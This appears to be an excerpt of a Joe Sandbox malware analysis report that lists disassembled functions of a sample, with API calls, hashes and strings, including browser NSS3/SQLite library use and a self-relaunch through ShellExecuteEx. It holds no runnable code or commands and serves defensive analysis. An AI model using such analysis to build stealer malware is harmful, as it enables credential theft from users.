Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 1317ddf1f9c1afdd93909f223843f69075992d328c88535c6b58c76ddc48183c
Instruction ID: a268315634fda69ed0a537ef202e87298384d27024bdd5aae2ec85167a5c17e0
Opcode Fuzzy Hash: 1317ddf1f9c1afdd93909f223843f69075992d328c88535c6b58c76ddc48183c
Instruction Fuzzy Hash: 6421BA75D14209ABCB14EFE4D945AEEB7BABF4C305F04852EE50AE3250EB345644CB68

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC03C0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,6BBC4B27,?,?,00015180,00000005,?,6BBC4AD1), ref: 6BBC03E0
GetLastError.KERNEL32(?,6BBC4B27,?,?,00015180,00000005,?,6BBC4AD1), ref: 6BBC03FD
DeleteCriticalSection.KERNEL32(00000005,?,?,?,6BBC4B27,?,?,00015180,00000005,?,6BBC4AD1), ref: 6BBC0419
free.MOZGLUE(?,?,6BBC4B27,?,?,00015180,00000005,?,6BBC4AD1), ref: 6BBC0420
PR_SetError.NSS3(FFFFE89D,00000000,?,?,?,6BBC4B27,?,?,00015180,00000005,?,6BBC4AD1), ref: 6BBC0434

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Error$CloseCriticalDeleteHandleLastSectionfree
String ID:
API String ID: 2568661452-0
Opcode ID: e04ca5c06506b7eecf779496023221e407954667cbcd7dacd1bc991b1e13e387
Instruction ID: e457304fe8742d563b03dc7705a1a6d89e356040d4a2064955c7fea885ba491f
Opcode Fuzzy Hash: e04ca5c06506b7eecf779496023221e407954667cbcd7dacd1bc991b1e13e387
Instruction Fuzzy Hash: 8501F7F5A01AA19BCF20DFB49808B5B37B8DF46B25F800568E92AC7540DB39E640C796

Uniqueness

Uniqueness Score: -1.00%

Function 6BB3E3D0 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000001,?,6BB47000), ref: 6BB3E3DD

Part of subcall function 6BB21770: calloc.MOZGLUE(00000001,0000019C,?,6BB215C2,?,?,?,?,?,00000001,00000040), ref: 6BB2178D

PR_EnterMonitor.NSS3(00000000,00000001,?,6BB47000), ref: 6BB3E3EC
PR_SetError.NSS3(FFFFE001,00000000,6BB47000), ref: 6BB3E404
PL_NewHashTable.NSS3(00000000,6BB3E4C0,6BB3E460,?,00000000,00000000,6BB47000), ref: 6BB3E427

Part of subcall function 6BB1ACC0: memset.VCRUNTIME140(00000000,00000000,00000004), ref: 6BB1AD48

PR_ExitMonitor.NSS3(?,?,?,?,?,?,6BB47000), ref: 6BB3E449

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Monitor$EnterErrorExitHashTablecallocmemset
String ID:
API String ID: 2825337912-0
Opcode ID: af19d5ac772849ce69c5ee000d340f6556af3d4ec0d0e44aad141b684747c0f2
Instruction ID: b21ad3ab0e05ef448fa267137d14edc1a1dbddfe994b1fe6cf69b8e1b8f48490
Opcode Fuzzy Hash: af19d5ac772849ce69c5ee000d340f6556af3d4ec0d0e44aad141b684747c0f2
Instruction Fuzzy Hash: 7AF0C8B6D242A0A7FE50AA789C01B2E3778E716648F044162FD08D2251F73DEE5186F9

Uniqueness

Uniqueness Score: -1.00%

Function 004185A7 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004185B3

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__getptd.LIBCMT ref: 004185CA
__amsg_exit.LIBCMT ref: 004185D8
__lock.LIBCMT ref: 004185E8
__updatetlocinfoEx_nolock.LIBCMT ref: 004185FC

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction ID: cdd0eec35e4bf80da2317afb9b55000317a90f0185e5a3c9ee5e330d7cc08b67
Opcode Fuzzy Hash: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction Fuzzy Hash: A4F09632A49710AAD721BBBA9C027CA77B1AF00739F10411FF505A62D2CF6C69C1CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 6BC02B20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00020C24,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6BC02B64

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BC02B4E
misuse, xrefs: 6BC02B58
%s at line %d of [%.10s], xrefs: 6BC02B5D

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 632333372-648709467
Opcode ID: 1c0db06e87d506613852c1bcbebd80f30bee6f4a544dcc7bd7f229d627085380
Instruction ID: 288e532116dba4bab2683215e016c301719101609e1582c8258806ec43a6bd85
Opcode Fuzzy Hash: 1c0db06e87d506613852c1bcbebd80f30bee6f4a544dcc7bd7f229d627085380
Instruction Fuzzy Hash: 0F51E370B242064BEB04CF6988A17AEB7E2AF45314F04416DD89ADF341FB3ADB45C791

Uniqueness

Uniqueness Score: -1.00%

Function 6BBDA390 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BBDA415
PK11_DeriveWithFlags.NSS3(?,83000338,00000000,00000000,0000010C,?,00002800), ref: 6BBDA516

Strings

tls13 , xrefs: 6BBDA3E1
dtls13, xrefs: 6BBDA3E6, 6BBDA472

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: DeriveErrorFlagsK11_With
String ID: dtls13$tls13
API String ID: 2484761064-4151311251
Opcode ID: 3240ef3709839d2891782348da47cb3f89cd587cb3b71501de3a5832cbf18161
Instruction ID: 83d5d0b893b0a83597709a1aac1fdfa3ca0a58b2479d3a5e4564ea1761d358ec
Opcode Fuzzy Hash: 3240ef3709839d2891782348da47cb3f89cd587cb3b71501de3a5832cbf18161
Instruction Fuzzy Hash: C9419F719002589BEB208F24CC95BDE77B9EF48318F4045A5EE0877290E778AA94CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6BC06B20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

sqlite3_snprintf.NSS3(?,6BC06AC0,6BC6AAF9,00000000,?,6BC06AC0,?), ref: 6BC06BA9
sqlite3_free.NSS3(00000000,?,?,?,?,?,6BC06AC0,?), ref: 6BC06BB2
sqlite3_snprintf.NSS3(?,6BC06AC0,OsError 0x%lx (%lu),00000000,00000000,?,6BC06AC0,?), ref: 6BC06BD9

Strings

OsError 0x%lx (%lu), xrefs: 6BC06BCE

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: sqlite3_snprintf$sqlite3_free
String ID: OsError 0x%lx (%lu)
API String ID: 2089385377-3720535092
Opcode ID: 6f20678c63a5bd60fb94032d50fe1b5b60526e555efb9831b535d4338316634f
Instruction ID: 5087754c3bb65ef08fc98144fc0635301b58e520db201fc3e84a9770eaf9db89
Opcode Fuzzy Hash: 6f20678c63a5bd60fb94032d50fe1b5b60526e555efb9831b535d4338316634f
Instruction Fuzzy Hash: 401190B5910105ABEB18AFA5EC89D7F7B79EF8A359B00002CE50992241EB359E45C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 004132F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00413323

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

ShellExecuteEx.SHELL32(0000003C), ref: 004133E6
ExitProcess.KERNEL32 ref: 00413415

Strings

<, xrefs: 00413399

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 3496981387204af82f82ede6615a3297053cf3b1ca5d7d00cc566b378b6a6749
Instruction ID: 9270ca21e45796c21bf284f368f95b7d0dbf71ea93a5a7258f1c6a627d8bac6b
Opcode Fuzzy Hash: 3496981387204af82f82ede6615a3297053cf3b1ca5d7d00cc566b378b6a6749
Instruction Fuzzy Hash: 383144B19012189BDB14EB91DD91FDDBB78AF48304F80518DF20566191DF746B89CF9C

Uniqueness

Uniqueness Score: -1.00%

Function 6BC0A3F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010B70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6BC0A4A6

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BC0A490
%s at line %d of [%.10s], xrefs: 6BC0A49F
database corruption, xrefs: 6BC0A49A

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 2c5ffd93acbf838edc32b20563ebd2c1a3577e915aff1096410561395bcbab80
Instruction ID: 75be8cd9ddb7fc5e14b1478259558859ef9cb3ddd9ef9c73df05248b7210a86c
Opcode Fuzzy Hash: 2c5ffd93acbf838edc32b20563ebd2c1a3577e915aff1096410561395bcbab80
Instruction Fuzzy Hash: 7E21F030A002049FD704DF69D985F5ABBE4EF85304F1140A9E9089F352EB79EE41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC0C3E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000105AA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6BC0C437

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BC0C421
%s at line %d of [%.10s], xrefs: 6BC0C430
database corruption, xrefs: 6BC0C42B

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: c013f4f5836484bdb643a759220f58042bcea4b45bf2e711761cd89c7c819980
Instruction ID: fb48959daf17fb77940f6c64e09974dee7281dab70b30d2a5cb42f95f38260b3
Opcode Fuzzy Hash: c013f4f5836484bdb643a759220f58042bcea4b45bf2e711761cd89c7c819980
Instruction Fuzzy Hash: 2711E275A10114ABCB008EA5DC81EBF7365BB84354B044164FD1C5B342FB3ADE52C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 6BB1AB80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BB1AB8A
PR_SetError.NSS3(FFFFE897,00000000), ref: 6BB1AC07

Part of subcall function 6BBDC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BBDC2BF

PR_LogPrint.NSS3(connect -> %d,00000000), ref: 6BB1AC1A

Strings

connect -> %d, xrefs: 6BB1AC15

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Value$ErrorPrint
String ID: connect -> %d
API String ID: 1784924131-3487059786
Opcode ID: 211b728f7054123ff4419632e95e638f187bba7bff21d927932938501abca283
Instruction ID: 0c8e4ee7668bf67094a029d7767ab1553d9523713513a02ad32b120c05d0d912
Opcode Fuzzy Hash: 211b728f7054123ff4419632e95e638f187bba7bff21d927932938501abca283
Instruction Fuzzy Hash: A50126709081C49FF7002F38CC06B7E3B62EF42359F44C664E8698A162F779AA848A91

Uniqueness

Uniqueness Score: -1.00%

Function 6BC42BE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6BC42BFA
PR_ExitMonitor.NSS3 ref: 6BC42C2B
PR_LogPrint.NSS3(%s incr => %d (for %s),?,?,?), ref: 6BC42C5D

Strings

%s incr => %d (for %s), xrefs: 6BC42C58

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Monitor$EnterExitPrint
String ID: %s incr => %d (for %s)
API String ID: 2736670396-2912983388
Opcode ID: 562842ddc9989461dfad1375527b7cdbf639e5dd352f25fc2cb81b2a9abefc2f
Instruction ID: b286888966b879a0729eefe1cefd09b2863a8b2caecf531fb4066aa027766817
Opcode Fuzzy Hash: 562842ddc9989461dfad1375527b7cdbf639e5dd352f25fc2cb81b2a9abefc2f
Instruction Fuzzy Hash: 74014C72E20110AFF712AE29DC5261B77BDEB45358B044069D889CB300FB39EF06C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00415450 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
wsprintfW.USER32 ref: 00415478

Strings

%hs, xrefs: 0041546F

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction ID: 2a04a3b42468460cff415e79ad4cc7303691da2b1e165ac812b33aed5ccf4e4e
Opcode Fuzzy Hash: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction Fuzzy Hash: A5E0ECB5A40608BFDB20DFD4ED0AEAD77A9EB48701F100194F90AD7640DA719E109B95

Uniqueness

Uniqueness Score: -1.00%

Function 6BC143A0 Relevance: 6.3, APIs: 5, Instructions: 78COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,00000000,?,00000001,00000000,?,6BAD0EBE,?), ref: 6BC143E2
memcpy.VCRUNTIME140(00000000,?,?), ref: 6BC143F6
memcpy.VCRUNTIME140(00000000,?,?), ref: 6BC14414
memcpy.VCRUNTIME140(00000000,?,?), ref: 6BC1442D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6BC14444

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 6dab6cba2fd5c616e69b08325cb18f81448a641eb568e9f493252d65969e6fa5
Instruction ID: d74e9bf54954a9b3357edc20e095fd46d262476ec69d4b16851ea1c09333bf8d
Opcode Fuzzy Hash: 6dab6cba2fd5c616e69b08325cb18f81448a641eb568e9f493252d65969e6fa5
Instruction Fuzzy Hash: 282146B2911922BBDB008F25CC418BAB3A8FF40328B414029F94497A00F738FB35DBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB50 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04287A20,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CBD1
lstrlen.KERNEL32(00000000), ref: 0040CDE8
lstrlen.KERNEL32(00000000), ref: 0040CDFC
DeleteFileA.KERNEL32(00000000), ref: 0040CE75

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: a388f1d5562cedac2aeec40e4b540315215faf5c593fb20d88f4c688e21c03fc
Instruction ID: 6e212494759c8e3b152de70cf12e9653d7fde48daaab02ad2b76da051d612c4f
Opcode Fuzzy Hash: a388f1d5562cedac2aeec40e4b540315215faf5c593fb20d88f4c688e21c03fc
Instruction Fuzzy Hash: 1B914A729102049BCB14FBA1DC51EEE7739BF14304F51425EF51676491EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 6BABE330 Relevance: 6.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(-00000004,00000000,000001FC,?,?,6BABE248), ref: 6BABE388
memcpy.VCRUNTIME140(00000000,00000000,000001F4,?,6BABE248), ref: 6BABE446
memset.VCRUNTIME140(00000000,00000000,000001F4,?,?,?,?,6BABE248), ref: 6BABE457

Part of subcall function 6BABE330: sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6BABE248), ref: 6BABE499

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
